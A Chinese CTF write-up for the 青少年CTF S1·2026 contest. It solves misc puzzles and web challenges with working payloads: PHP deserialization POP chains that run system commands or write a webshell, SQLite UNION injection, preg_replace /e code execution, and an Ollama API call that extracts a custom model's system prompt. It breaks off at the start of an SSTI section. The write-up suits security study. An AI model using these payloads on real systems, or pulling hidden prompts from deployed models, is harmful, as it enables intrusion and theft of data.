{"id":3396,"date":"2026-04-01T15:23:40","date_gmt":"2026-04-01T07:23:40","guid":{"rendered":"https:\/\/www.sanjiuctf.com\/?p=3396"},"modified":"2026-04-01T15:23:41","modified_gmt":"2026-04-01T07:23:41","slug":"%e9%9d%92%e5%b0%91%e5%b9%b4ctf-s1%c2%b72026-%e5%85%ac%e7%9b%8a%e8%b5%9bwp","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.com\/?p=3396","title":{"rendered":"\u9752\u5c11\u5e74CTF S1\u00b72026 \u516c\u76ca\u8d5bwp"},"content":{"rendered":"\n

\u524d\u8a00<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6bd4\u8d5b\u65f6\u95f4\u975e\u5e38\u5f97\u957f\uff0c\u6709\u4e9b\u9898\u76ee\u4e0a\u7ebf\u4e86\uff0c\u4e2d\u95f4\u4e5f\u4e0b\u4e86\u4e00\u4e9b\u9898\u76ee\uff0c\u4f46\u662f\u540e\u9762\u597d\u50cf\u5c31\u6ca1\u6709\u4e0a\u65b0\u9898\u76ee\u4e86\u3002<\/p>\n\n\n\n

\u961f\u4f0d\u540d\u5b57:flag \u6392\u540d\uff1a15<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u89e3\u9898\u60c5\u51b5\u5168\u89e3<\/p>\n\n\n\n

Misc<\/h1>\n\n\n\n

\u73ab\u574f\u7684\u538b\u7f29\u5305<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u538b\u7f29\u5305\u662f\u635f\u574f\u7684<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6ca1\u6709\u6587\u4ef6\u5934\uff0c\u53ef\u4ee5\u770b\u5230\u91cc\u9762\u6709word \u8865\u4e00\u4e0b\u6587\u4ef6\u5934\u5c31\u884c<\/p>\n\n\n\n

\u4f46\u662f\u53ef\u4ee5\u4e0d\u7528\u8865\u76f4\u63a5binwalk\u5c31\u884c<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u67e5\u770b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

document.xml<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
flag{w3_w111_411_60_fur7h3r_4nd_fur7h3r}<\/code><\/pre>\n\n\n\n
Ollama Prompt Injection<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u540d\u5b57\u5e94\u8be5\u5c31\u662f\u4e00\u4e2aAI\u9898\u76ee nc\u65e0\u6cd5\u8fde\u63a5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u901a\u5e38 Ollama \u7684 API \u9ed8\u8ba4\u76d1\u542c\u5728 11434 \u7aef\u53e3\uff0c\u8fd9\u91cc\u88ab\u6620\u5c04\u5230\u4e86 55859<\/p>\n\n\n\n
\u83b7\u53d6\u6a21\u578b\u5217\u8868<\/strong>\uff1a\u4f7f\u7528 \/api\/tags<\/code> \u63a5\u53e3\u67e5\u770b\u670d\u52a1\u5668\u4e0a\u5b89\u88c5\u7684\u6a21\u578b\u3002<\/p>\n\n\n\n
http://challenge.qsnctf.com:55872\/api\/tags\n\u6216\u8005 curl http:\/\/challenge.qsnctf.com:55872\/api\/tags<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u81ea\u5b9a\u4e49\u6a21\u578b\uff1actf-model:latest<\/code><\/p>\n\n\n\n
\u63d0\u53d6\u7cfb\u7edf\u63d0\u793a\u8bcd<\/strong>\uff1a\u4f7f\u7528 \/api\/show<\/code> \u63a5\u53e3\u5bfc\u51fa\u8be5\u6a21\u578b\u7684\u8be6\u7ec6\u914d\u7f6e\uff0c\u53ef\u80fdflag \u4f5c\u4e3a\u7cfb\u7edf\u9884\u8bbe\u6307\u4ee4\u85cf\u5728\u5176\u4e2d\u3002<\/p>\n\n\n\n
curl http:\/\/challenge.qsnctf.com:55872\/api\/show -d '{\"name\": \"ctf-model:latest\"}'<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6216\u8005\u4f7f\u7528 HackBar \u63d2\u4ef6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{de7199c3085c47028de9cbae460dd2c7}<\/code><\/pre>\n\n\n\n
\u54e6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e00\u4e2a\u54e6010\u67e5\u770b\u5185\u5bb9<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u53d1\u73b0pk\u5934\u4f46\u662f\u88ab\u53cd\u8f6c\u4e86 \u6309\u71678\u5b57\u8282\u53cd\u8f6c\u56de\u6765<\/p>\n\n\n\n
py3\u811a\u672c<\/p>\n\n\n\n
import struct\n\ndef solve():\n    input_file = \"\u54e6\"\n    output_file = \"flag.zip\"\n\n    try:\n        with open(input_file, 'rb') as f:\n            content = f.read()\n    except FileNotFoundError:\n        print(f\"\u627e\u4e0d\u5230\u6587\u4ef6: {input_file}\uff0c\u8bf7\u786e\u8ba4\u6587\u4ef6\u540d\u6216\u8def\u5f84\u3002\")\n        return\n\n    recovered_data = bytearray()\n\n    # \u5168\u6587\u63098\u5b57\u8282\u5757\u53cd\u8f6c\u7684\n    chunk_size = 8\n\n    for i in range(0, len(content), chunk_size):\n        chunk = content[i : i + chunk_size]\n        recovered_data.extend(chunk[::-1])\n\n    with open(output_file, 'wb') as f:\n        f.write(recovered_data)\n\n    print(f\"\u5904\u7406\u5b8c\u6210\uff01\u5df2\u751f\u6210\u6587\u4ef6: {output_file}\")\n    print(\" flag.zip \u3002\")\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\u6709\u52a0\u5bc6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0d\u662f\u4f2a\u52a0\u5bc6\uff0c\u7206\u7834\u65e0\u89e3\uff0c\u53ea\u80fd\u5df2\u77e5\u660e\u6587\u8fdb\u884c\u7206\u7834\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
bkcrack.exe -C flag.zip -c a.png -x 0 89504E470D0A1A0A0000000D49484452<\/code><\/pre>\n\n\n\n
d590788c b34e73fb 40e733d1<\/code><\/pre>\n\n\n\n
\u6709key\u4e86\u76f4\u63a5\u89e3\u538b<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u56fe\u7247\u8fdb\u884cforemost\u53ef\u4ee5\u5f97\u5230\u4e24\u5f20\u56fe\u7247\u8fdb\u884c\u53cc\u56fe\u76f2\u6c34\u5370<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
python bwmforpy3.py decode 2.png 1.png 3.png<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{01d38cf8-e6f9-11f0-8fcd-11155d4a}<\/code><\/pre>\n\n\n\n
qr<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7f29\u5c0f\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u624b\u673a\u626b\u7801\u6216\u8005\u6539\u53d8\u989c\u8272\u7535\u8111\u53ef\u4ee5\u626b\u7801<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{56876aae7cb7b98a3756bac05c6b6675}<\/code><\/pre>\n\n\n\n
QSNCTF<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7075\u5f02\u4e8b\u4ef6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
0110011001101100011000010110011101111011001101000110010000110010001101000011011101100001011000110011001100110001001101100110001000110001011000110110011000110111011001010110011000110101001100110110000100110001001101010011100101100011001100110011000000110001001101100110001001100001011000100011100101111101<\/code><\/pre>\n\n\n\n
\u4e8c\u8fdb\u5236\u8f6cASCII<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{4d247ac316b1cf7ef53a159c3016bab9}<\/code><\/pre>\n\n\n\n
\u627e\u5230\u5446\u552f<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5148base64\u8f6c\u56fe\u7247jpg<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
010\u67e5\u770b<\/p>\n\n\n\n
\u53d1\u73b0\u8fd8\u6709base64\u8f6c\u56fe\u7247\u63d0\u53d6\u5728\u8f6c\u56fe\u7247\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\n\nwith open('string.txt', 'r') as f:\n    content = f.read()\n\nstart_index = content.find('iVBORw0KGgoAAA')\nif start_index != -1:\n    img_data_b64 = content[start_index:]\n    img_data = base64.b64decode(img_data_b64)\n\n    with open('haha.png', 'wb') as f:\n        f.write(img_data)\n    print(\"\u6210\u529f\u63d0\u53d6 haha.png\")\nelse:\n    print(\"\u672a\u627e\u5230 PNG \u6570\u636e\u5934\")<\/code><\/pre>\n\n\n\n
\u51fa\u6765\u4e8c\u7ef4\u7801\u626b\u63cf\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{iam_here!!!}<\/code><\/pre>\n\n\n\n
\u597d\uff0c\u628a\u4ed6\u4eec\u4e0a\u5e02<\/h2>\n\n\n\n
\u5df2\u77e5\u660e\u6587\u7206\u7834\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9700\u8981\u7528 Python \u7684 zlib<\/code> \u5e93\u628a\u5b83\u89e3\u538b\u4e00\u4e0b<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import zlib\n\ntry:\n    with open('pass.txt', 'rb') as f:\n        data = f.read()\n\n    print(f\"[-] \u8bfb\u53d6\u5230\u6570\u636e\u957f\u5ea6: {len(data)}\")\n\n    decompressed_data = zlib.decompress(data, -15)\n\n    print(f\"[+] \u89e3\u538b\u6210\u529f\uff01\u539f\u59cb\u6587\u4ef6\u5927\u5c0f: {len(decompressed_data)} \u5b57\u8282\")\n\n    header = decompressed_data[:8].hex().upper()\n    print(f\"[+] \u771f\u5b9e\u6587\u4ef6\u5934: {header}\")\n\n    ext = \"txt\"\n    if header.startswith(\"89504E47\"):\n        ext = \"png\"\n        print(\"[!] \u8fd9\u662f\u4e00\u4e2a PNG \u56fe\u7247\uff01\")\n    elif header.startswith(\"FFD8FF\"):\n        ext = \"jpg\"\n    elif header.startswith(\"504B0304\"):\n        ext = \"zip\"\n\n    out_filename = f\"real_pass.{ext}\"\n    with open(out_filename, 'wb') as f:\n        f.write(decompressed_data)\n\n    print(f\"[+] \u5df2\u4fdd\u5b58\u4e3a: {out_filename} (\u5feb\u53bb\u6253\u5f00\u5b83\uff01)\")\n\nexcept Exception as e:\n    print(f\"[x] \u89e3\u538b\u5931\u8d25: {e}\")\n    print(\"\u63d0\u793a\uff1a\u5982\u679c\u62a5\u9519\uff0c\u8bf7\u5c1d\u8bd5\u6539\u7528 bkcrack -U \u547d\u4ee4\u751f\u6210\u4e00\u4e2a\u65b0\u7684 zip \u6587\u4ef6\u76f4\u63a5\u6253\u5f00\u3002\")<\/code><\/pre>\n\n\n\n
pass.txt\u662f\u4e00\u4e2apng<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u626b\u63cf<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u538b\u7f29\u5305\u5bc6\u7801<\/p>\n\n\n\n
1145141919810<\/code><\/pre>\n\n\n\n
\u89e3\u538b7z<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag\uff0cbase64\u89e3\u5bc6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bb0\u5f97\u540e\u9762\u7684!!!<\/p>\n\n\n\n
flag{What_WAS_Y0ur_MISS0N_in_ShangHAI!!!}<\/code><\/pre>\n\n\n\n
\u6d88\u5931\u7684Yui<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9886\u5bbd\u5b57\u7b26<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u77e5\u9053flag\u683c\u5f0f<\/p>\n\n\n\n
txt\u6bcf\u4e2a\u90fd\u6709emj \u53ef\u4ee5\u63d0\u53d6\u51fa\u6765\u8fdb\u884cbase100\u89e3\u5bc6<\/p>\n\n\n\n
\ud83d\udc6b\ud83d\udc5f\ud83d\udc5c\ud83d\udc67\ud83d\udc58\ud83d\udc6a\ud83d\udc6a\ud83d\udce6\ud83d\udcb3\ud83d\udc91\ud83d\udc4b\ud83d\udc69\ud83d\udc50\ud83d\udc56\ud83d\udc6b\ud83d\udc66\ud83d\udc56\ud83d\udc3d\ud83d\udc28\ud83d\udc45\ud83d\udc5b\ud83d\udc56\ud83d\udc64\ud83d\udc2a<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u538b\u7f29\u5305\u5bc6\u7801<\/p>\n\n\n\n
TrY_to_F1Nd_m3<\/code><\/pre>\n\n\n\n
\u91cc\u9762\u4e8c\u7ef4\u7801\u626b\u63cf\u5f97\u5230 \u4f46\u662f\u9700\u8981key key\u5e94\u8be5\u5728txt\u91cc\u9762<\/p>\n\n\n\n
z2qbTYV1U4vpBNoL7jEGcAFyrLpTnlNQdi4OuFxsFl8=<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7b2c\u4e00\u90e8\u5206\uff1a \u949f\u697c\u6307\u9488\u6307\u5411\u201c\u5341\u4e00\u65f6\u56db\u5341\u4e94\u5206\u201d  -> \u6570\u5b57 1145\n\u7b2c\u4e8c\u90e8\u5206\uff1a \u6863\u6848\u67dc\u7684\u9694\u5c42\u7f16\u53f7\u4e3a\u201c14\u201d\u4e0e\u201c19\u201d  -> \u6570\u5b57 14 \u548c 19\n\u7b2c\u4e09\u90e8\u5206\uff1a \u5b66\u672f\u671f\u520a\u7684\u5e74\u4efd\u662f\u201c1981\u201d  -> \u6570\u5b57 1981\n\u7b2c\u56db\u90e8\u5206\uff1a \u4eea\u5668\u523b\u5ea6\u76d8\u663e\u793a\u201c\u96f6\u70b9\u201d  -> \u6570\u5b57 0\n1145141919810<\/code><\/pre>\n\n\n\n
rc4\u89e3\u5bc6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
31\u00b049\u203214\u2033N 117\u00b013\u203238\u2033E<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5408\u80a5<\/p>\n\n\n\n
flag{hefei}<\/code><\/pre>\n\n\n\n
Web<\/h1>\n\n\n\n
S1\u7b7e\u5230<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7fa4\u516c\u544a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Q5NC7F-51<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{efc9734c06274023aee974e8aaa91f2b}<\/code><\/pre>\n\n\n\n
easy_php<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
PHP \u53cd\u5e8f\u5217\u5316 (POP \u94fe\u6784\u9020)\u9898\u76ee<\/p>\n\n\n\n
\u5165\u53e3\u70b9\uff1aunserialize($_GET['code'])\uff0c\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002\n\u8fc7\u6ee4\uff1apreg_match('\/flag\/i', $input) \u7981\u6b62\u8f93\u5165\u4e2d\u51fa\u73b0 flag \u5b57\u7b26\u4e32\u3002<\/code><\/pre>\n\n\n\n
POP \u94fe\u5206\u6790\uff1a<\/p>\n\n\n\n
\u8d77\u70b9\uff1aMonitor::__destruct()\u3002\u5f53\u5bf9\u8c61\u9500\u6bc1\u65f6\uff0c\u5982\u679c $status \u4e3a \"danger\"\uff0c\u8c03\u7528 $this->reporter->alert()\u3002\n\u8df3\u677f\uff1a\u6211\u4eec\u9700\u8981\u5c06 $reporter \u66ff\u6362\u4e3a Screen \u7c7b\u7684\u4e00\u4e2a\u5b9e\u4f8b\u3002\n\u7ec8\u70b9\uff1aScreen::alert()\u3002\u8be5\u65b9\u6cd5\u6267\u884c\u52a8\u6001\u51fd\u6570\u8c03\u7528 $func($this->content)\u3002<\/code><\/pre>\n\n\n\n
\u903b\u8f91\uff1a<\/p>\n\n\n\n
\u6784\u9020\u4e00\u4e2a Monitor \u5bf9\u8c61\uff0c\u5c06 $status \u8bbe\u4e3a danger\u3002\n\u7136\u540e\u5c06 Monitor \u7684 $reporter \u5c5e\u6027\u8bbe\u4e3a\u4e00\u4e2a Screen \u5bf9\u8c61\u3002\n\u8bbe\u7f6e Screen \u7684 $format \u4e3a system\uff08\u6267\u884c\u547d\u4ee4\uff09\u3002\n\u8bbe\u7f6eScreen\u7684$content \u4e3acat \/f*\n\u4f7f\u7528\u901a\u914d\u7b26 * \u4e3a\u4e86\u7ed5\u8fc7\u4ee3\u7801\u4e2d\u5bf9 flag\u5173\u952e\u8bcd\u7684\u6b63\u5219\u8fc7\u6ee4\u3002Shell \u4f1a\u5c06 \/f* \u89e3\u6790\u4e3a \/flag\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u4e86<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
<?php\nclass Monitor {\n    private $status = \"danger\";\n    private $reporter;\n\n    public function __construct($obj) {\n        $this->reporter = $obj;\n    }\n}\n\nclass Screen {\n    public $content = \"cat \/f*\";  \/\/ \u4f7f\u7528\u901a\u914d\u7b26\u7ed5\u8fc7 preg_match\n    public $format = \"system\";    \/\/ \u8c03\u7528 system \u51fd\u6570\u6267\u884c\u547d\u4ee4\n}\n\n\/\/ 1. \u521b\u5efa Screen \u5bf9\u8c61\uff0c\u7528\u4e8e\u6267\u884c\u547d\u4ee4\n$screen = new Screen();\n\n\/\/ 2. \u521b\u5efa Monitor \u5bf9\u8c61\uff0c\u5e76\u5c06 reporter \u6307\u5411 screen\u3002\n$monitor = new Monitor($screen);\n\n\/\/ 3. \u8f93\u51fa URL \u7f16\u7801\u540e\u7684 Payload\necho urlencode(serialize($monitor));\n?><\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bbf\u95ee URL\uff1a<\/p>\n\n\n\n
http://challenge.qsnctf.com:52694\/?code=O%3A7%3A%22Monitor%22%3A2%3A%7Bs%3A15%3A%22%00Monitor%00status%22%3Bs%3A6%3A%22danger%22%3Bs%3A17%3A%22%00Monitor%00reporter%22%3BO%3A6%3A%22Screen%22%3A2%3A%7Bs%3A7%3A%22content%22%3Bs%3A7%3A%22cat+%2Ff%2A%22%3Bs%3A6%3A%22format%22%3Bs%3A6%3A%22system%22%3B%7D%7D<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{711160717847437d8dcb16093b91b948}<\/code><\/pre>\n\n\n\n
silent_logger<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SQL\u6ce8\u5165\u7684\u9898\u76ee<\/p>\n\n\n\n
\u6570\u636e\u5e93\uff1aSQLite\uff08\u540e\u9762\u6d4b\u8bd5\u53d1\u73b0 information_schema\u4e0d\u5b58\u5728\uff0c\u4f46 sqlite_master\u5b58\u5728\uff09\u3002<\/p>\n\n\n\n
\u5c31\u53ef\u4ee5\u8bf4\u660e\u6570\u636e\u5e93\u7528\u7684\u662fSQLite<\/p>\n\n\n\n
\u7206\u8868\u540d\uff1a
\u6784\u9020 Payload \u67e5\u8be2 sqlite_master`\u8868\uff1a<\/p>\n\n\n\n
-1' UNION SELECT 1, group_concat(tbl_name), 3 FROM sqlite_master WHERE type='table' --<\/code><\/pre>\n\n\n\n
\u5f97\u5230\u76ee\u6807\u8868\uff1aflags<\/code>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7206\u5217\u540d\uff1a
SQLite \u4e2d\u9700\u67e5\u770b\u5efa\u8868\u8bed\u53e5 (sql \u5b57\u6bb5) \u6765\u5f97\u77e5\u5217\u540d\uff1a<\/p>\n\n\n\n
-1' UNION SELECT 1, sql, 3 FROM sqlite_master WHERE tbl_name='flags' --<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u83b7\u53d6 flag\uff1a
\u67e5\u8be2 flags \u8868\u7684 value \u5217\uff1a<\/p>\n\n\n\n
-1 UNION SELECT 1, value, 3 FROM flags --<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{4ed7dedc44da4df8836977b4044b6e63}<\/code><\/pre>\n\n\n\n
Serialization<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u5165\u53e3\u5728unserialize($_POST['data']) \u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u3002\nPOP \u94fe\uff1aAuditLog::__toString() \u8c03\u7528 $this->handler->process()\uff0c\u5229\u7528 FileCache::process() \u5199\u5165\u6587\u4ef6\u3002\n\u7ed5\u8fc7\u53d1\u73b0\u5199\u5165\u6587\u4ef6\u65f6\u5934\u90e8\u5f3a\u5236\u62fc\u63a5\u4e86 <?php exit(...); ?>\u3002\n\u89e3\u51b3\uff1a\u5c31\u5229\u7528 PHP \u4f2a\u534f\u8bae php:\/\/filter\/write=convert.base64-decode\u5c31\u884c\u56e0\u4e3a exit \u8bed\u53e5\u4e2d\u7684 Base64 \u6709\u6548\u5b57\u7b26\u6570\u4e3a 33 \u4e2a\uff0c\u8865 3 \u4e2a\u5b57\u7b26\uff08aaa\uff09\u51d1\u9f50 36 \u4e2a\uff084\u7684\u500d\u6570\uff09\uff0c\u4f7f\u5934\u90e8\u89e3\u7801\u4e3a\u4e71\u7801\uff0c\u4ece\u800c\u7ed5\u8fc7\u9000\u51fa\u6307\u4ee4\u6267\u884c\u540e\u65b9\u7684 Webshell\u3002<\/code><\/pre>\n\n\n\n
Payload<\/strong><\/p>\n\n\n\n
<?php\nclass AuditLog {\n    public $handler;\n}\nclass FileCache { \n    public $filePath; \n    public $content; \n}\n\n$x = new AuditLog();\n$x->handler = new FileCache();\n$x->handler->filePath = 'php:\/\/filter\/write=convert.base64-decode\/resource=shell.php';\n$x->handler->content = 'aaa' . base64_encode('<?php system(\"cat \/f*\");?>');\n\necho urlencode(serialize($x));\n?><\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bbf\u95ee\uff1ahttp:\/\/challenge.qsnctf.com:52815\/shell.php<\/a><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{f41640613076473182404ee0fdbfac08} <\/code><\/pre>\n\n\n\n
\u65f6\u95f4\u80f6\u56ca\u7559\u8a00\u677f<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u903b\u8f91\u6f0f\u6d1e\uff0c\u5c31\u662f\u540e\u7aef\u6ca1\u6709\u6821\u9a8c\u65f6\u95f4\u9650\u5236<\/p>\n\n\n\n
\u89e3\u9898\u6b65\u9aa4<\/p>\n\n\n\n
F12 \u67e5\u770b\u6e90\u4ee3\u7801\u3002\n\u53d1\u73b0\u63a5\u53e3\uff1a\u5728 JavaScript \u4ee3\u7801\u4e2d\u53d1\u73b0\u6570\u636e\u8bf7\u6c42\u63a5\u53e3 get_content.php?id=\uff0c\u540c\u65f6\u5728 HTML \u5217\u8868\u4e2d\u53d1\u73b0\u672a\u89e3\u5c01\u7684 flag \u7559\u8a00\u5bf9\u5e94\u7684 ID \u4e3a content-2\uff08 id=2\uff09\u3002\n\u6784\u9020\u8bf7\u6c42\uff1a\u540e\u7aef\u5e76\u6ca1\u6709\u9a8c\u8bc1\u5f53\u524d\u65f6\u95f4\u662f\u5426\u5230\u8fbe\u89e3\u5c01\u65e5\u671f\uff0c\u76f4\u63a5\u8bbf\u95ee\u63a5\u53e3\u5373\u53ef\u7ed5\u8fc7\u524d\u7aef\u9650\u5236\u3002\n\u8bbf\u95ee\u5730\u5740\uff1ahttp:\/\/challenge.qsnctf.com:55741\/get_content.php?id=2<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{f3762adeca6943ccb33c8dc476c68610}<\/code><\/pre>\n\n\n\n
preg_replace<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5206\u6790<\/p>\n\n\n\n
\u9898\u76ee\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n
echo preg_replace(\"\/(.*)\/e\", \"\\1\", $input);<\/code><\/pre>\n\n\n\n
\u5728 PHP 5.x \u4e2d\uff0cpreg_replace<\/code> \u51fd\u6570\u7684 \/e<\/code> \u4fee\u9970\u7b26\u4f1a\u5c06\u66ff\u6362\u5b57\u7b26\u4e32\u4f5c\u4e3a PHP \u4ee3\u7801\u6267\u884c\u3002\u8fd9\u8bf4\u660e\u53d8\u91cf $input<\/code> \u7684\u5185\u5bb9\u4f1a\u88ab eval<\/code> \u6267\u884c\u3002<\/p>\n\n\n\n
\u7ed5\u8fc7\u9650\u5236<\/p>\n\n\n\n
\u76f4\u63a5\u4f20\u5165 system('ls') \u4f1a\u56e0\u4e3a\u51fd\u6570\u5185\u90e8\u81ea\u52a8\u8f6c\u4e49\u5355\u5f15\u53f7\u5bfc\u81f4\u8bed\u6cd5\u9519\u8bef\uff08syntax error\uff09\u3002\n\u7ed5\u8fc7\uff1a\u4f7f\u7528 $_GET[a] \u4f5c\u4e3a\u4e2d\u95f4\u53d8\u91cf\u4f20\u9012\u547d\u4ee4\u5b57\u7b26\u4e32\uff0c\u907f\u514d\u5728 data \u53c2\u6570\u4e2d\u76f4\u63a5\u51fa\u73b0\u5f15\u53f7\u3002\n\u5229\u7528 Payload\uff1a?data=system($_GET[a])&a=\u547d\u4ee4 \u5c31\u53ef\u4ee5\u4e86<\/code><\/pre>\n\n\n\n
Payload:<\/p>\n\n\n\n
http://challenge.qsnctf.com:55833\/?data=system($_GET[a])&a=ls<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
http:\/\/challenge.qsnctf.com:55833\/?data=system($_GET[a])&a=ls \/<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
http:\/\/challenge.qsnctf.com:55833\/?data=system($_GET[a])&a=cat \/flag<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{dff12d1dd44749e1a40d91306f659e8c} <\/code><\/pre>\n\n\n\n
CallBack<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u7528 array_map($callback, [0,1,2,3])\uff0c\u8fd9\u610f\u5473\u7740\u7528\u6237\u4f20\u5165\u7684\u51fd\u6570\u4f1a\u88ab\u6267\u884c\uff0c\u4f46\u53c2\u6570\u88ab\u5f3a\u5236\u56fa\u5b9a\u4e3a\u6570\u5b57 0-3\u3002\u56e0\u6b64\uff0csystem \u7b49\u547d\u4ee4\u6267\u884c\u51fd\u6570\u65e0\u6cd5\u4f7f\u7528\uff08system(0) \u65e0\u6548\uff09\u3002<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u7528 phpinfo() \u51fd\u6570\u3002<\/p>\n\n\n\n
\u5b83\u63a5\u53d7\u6574\u6570\u53c2\u6570,\u5ffd\u7565\u53c2\u6570\uff0c\u7b26\u5408\u9898\u76ee\uff0c\u5b83\u4f1a\u5c06\u670d\u52a1\u5668\u7684\u6240\u6709\u73af\u5883\u53d8\u91cf\u6253\u5370\u51fa\u6765<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
http://challenge.qsnctf.com:55842\/?callback=phpinfo<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
    qsnctf{c893c0079b974676b4dbffad9c43b7d8}<\/code><\/pre>\n\n\n\n
\u7b54\u6848\u4e4b\u4e66<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6a21\u677f\u6ce8\u5165\u3001WAF \u7ed5\u8fc7<\/p>\n\n\n\n
\u9898\u76ee\u662f Python Flask \u73af\u5883\u3002\u5728\u8f93\u5165\u6846\u8f93\u5165 {{7*7}}<\/code>\uff0c\u9875\u9762\u56de\u663e 49<\/code>\uff0c\u786e\u8ba4\u5b58\u5728 Jinja2 SSTI \u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
